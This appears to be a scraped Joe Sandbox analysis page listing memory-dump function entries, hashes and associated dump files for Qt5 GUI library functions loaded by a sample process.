                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Writing$?supportedDatabase@@@@FontFont@@List@System@Systems@malloc
                                                                                                                                                                                                                • String ID: QRawFont$supportedWritingSystems$supportedWritingSystems(self) -> List[QFontDatabase.WritingSystem]
                                                                                                                                                                                                                • API String ID: 1806276047-1102475657
                                                                                                                                                                                                                • Opcode ID: 8f3a525a582965fcf6484d76d7cf6a81449d8125b6e4e0373f0169e7182a4920
                                                                                                                                                                                                                • Instruction ID: 6c54cedd9359c338abf75c4e6ffc2442b68fe9d687909b8b457bd7670f7278a4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3a525a582965fcf6484d76d7cf6a81449d8125b6e4e0373f0169e7182a4920
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79111BB5B18B4681EB10DF75E8586A937A8FB95B84FA180B6CD4D07320CF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?allFormats@QTextDocument@@QEBA?AV?$QVector@VQTextFormat@@@@XZ.QT5GUI ref: 00007FFB9A2ED978
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?allDocument@@Format@@@@Formats@Vector@malloc
                                                                                                                                                                                                                • String ID: QTextDocument$allFormats$allFormats(self) -> List[QTextFormat]
                                                                                                                                                                                                                • API String ID: 1543669490-2229282000
                                                                                                                                                                                                                • Opcode ID: 600731a6581c9f6395082d5c0ad6a393f3f22c8132f2c5fb468e2748b146cb12
                                                                                                                                                                                                                • Instruction ID: b043c009e72e128f22fee7fa688b3c429db7b4884b0f10f7c9bbd40096d09daf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 600731a6581c9f6395082d5c0ad6a393f3f22c8132f2c5fb468e2748b146cb12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39111BB5B08B4681EB10DF75E8986A937A8FB55B84FA180B6CE4D03320DF7DE949C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?pageBreakPolicy@QTextBlockFormat@@QEBA?AV?$QFlags@W4PageBreakFlag@QTextFormat@@@@XZ.QT5GUI ref: 00007FFB9A311978
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BreakText$?pageBlockFlag@Flags@Format@@Format@@@@PagePolicy@malloc
                                                                                                                                                                                                                • String ID: QTextFrameFormat$pageBreakPolicy$pageBreakPolicy(self) -> QTextFormat.PageBreakFlags
                                                                                                                                                                                                                • API String ID: 4265840606-525151680
                                                                                                                                                                                                                • Opcode ID: b8ddc5e155245d2593f6f06130f50f17be098139b34002834aabde2105e7c6e6
                                                                                                                                                                                                                • Instruction ID: 22609e6ca9732905d7d5836f35bdec3bb81b60670cfde21bf5b57986350ff875
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8ddc5e155245d2593f6f06130f50f17be098139b34002834aabde2105e7c6e6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 281109B5B08A4A81EB109F75E8486A937A8FB55B84FA180B6CE5C43320DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?availableSize@QScreen@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FFB9A3079E8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?availableScreen@@Size@Size@@malloc
                                                                                                                                                                                                                • String ID: QScreen$availableSize$availableSize(self) -> QSize
                                                                                                                                                                                                                • API String ID: 1053042026-1315219721
                                                                                                                                                                                                                • Opcode ID: 7c585ea7f9efd6f36537a189a62de1dbd8afd4c73795f70f61b3db991dae5c55
                                                                                                                                                                                                                • Instruction ID: ff346ab28f8c194fb95e5a5cbf8bbf24d009067efa46b034a012de31678a5739
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c585ea7f9efd6f36537a189a62de1dbd8afd4c73795f70f61b3db991dae5c55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E111BB5B08A96C1EB10DF75E8586A933A8FB95B84FA140B6CD4D03320CF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?textFormats@QTextBlock@@QEBA?AV?$QVector@UFormatRange@QTextLayout@@@@XZ.QT5GUI ref: 00007FFB9A341988
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?textBlock@@FormatFormats@Layout@@@@Range@Vector@malloc
                                                                                                                                                                                                                • String ID: QTextBlock$textFormats$textFormats(self) -> List[QTextLayout.FormatRange]
                                                                                                                                                                                                                • API String ID: 2459372140-882490682
                                                                                                                                                                                                                • Opcode ID: f79ca7cf93497acdb25f7d2cdb24a3b753fb5bc26d950d45fc4d5a315d5c3835
                                                                                                                                                                                                                • Instruction ID: 5dcbc2bdd6001a1782d50356812dcf8c1c1efd5bb1cff652d8db1e78abc1bec9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f79ca7cf93497acdb25f7d2cdb24a3b753fb5bc26d950d45fc4d5a315d5c3835
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6115BB5B18B4681EB10CF75E8486A937A8FB95B88FA180B6CD4C03320DF7CD549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?defaultFont@QTextDocument@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FFB9A2EB9B8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?defaultDocument@@Font@Font@@Textmalloc
                                                                                                                                                                                                                • String ID: QTextDocument$defaultFont$defaultFont(self) -> QFont
                                                                                                                                                                                                                • API String ID: 2933974531-580531534
                                                                                                                                                                                                                • Opcode ID: ae45e567e2619f1e407fceedbee1129f9c88d3354b5415c03124cbb39b2ea2fc
                                                                                                                                                                                                                • Instruction ID: 0fda678dad3bad24e6af14270856bb507fafece00d74f60de1916ed4f1a5a95e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae45e567e2619f1e407fceedbee1129f9c88d3354b5415c03124cbb39b2ea2fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72111EB5B09A4681EB20DF75E8586A937A8FF55B84FA180B6CD4D03320CF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?manufacturer@QScreen@@QEBA?AVQString@@XZ.QT5GUI ref: 00007FFB9A30DA48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?manufacturer@Screen@@String@@malloc
                                                                                                                                                                                                                • String ID: QScreen$manufacturer$manufacturer(self) -> str
                                                                                                                                                                                                                • API String ID: 3036166716-2931227326
                                                                                                                                                                                                                • Opcode ID: 7257908f5dc9e15f6ee32110725d948e4614b3f2fad6f9d5b3bf0e1cd19a533a
                                                                                                                                                                                                                • Instruction ID: c98f9c4ee52c2c24ce0cb4635e4ae9f15f477a3d1bc43a7908bff6bd8149b744
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7257908f5dc9e15f6ee32110725d948e4614b3f2fad6f9d5b3bf0e1cd19a533a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 221135B5B08A56C1EB60DF75E8486A933A8FB95B84FA180B6CE0C03320CF7CD589C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?window@QPainter@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FFB9A339A68
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?window@Painter@@Rect@@malloc
                                                                                                                                                                                                                • String ID: QPainter$window$window(self) -> QRect
                                                                                                                                                                                                                • API String ID: 83040069-2596992568
                                                                                                                                                                                                                • Opcode ID: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
                                                                                                                                                                                                                • Instruction ID: 2bc937dd9499ea94be2abcbb10333fdb557ad6ee08204dc86f836d36613a63af
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C11139B6B18A86C1EB10DF35E8586A933A8FB85B94FA140B6CE4D03320CF7CE549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
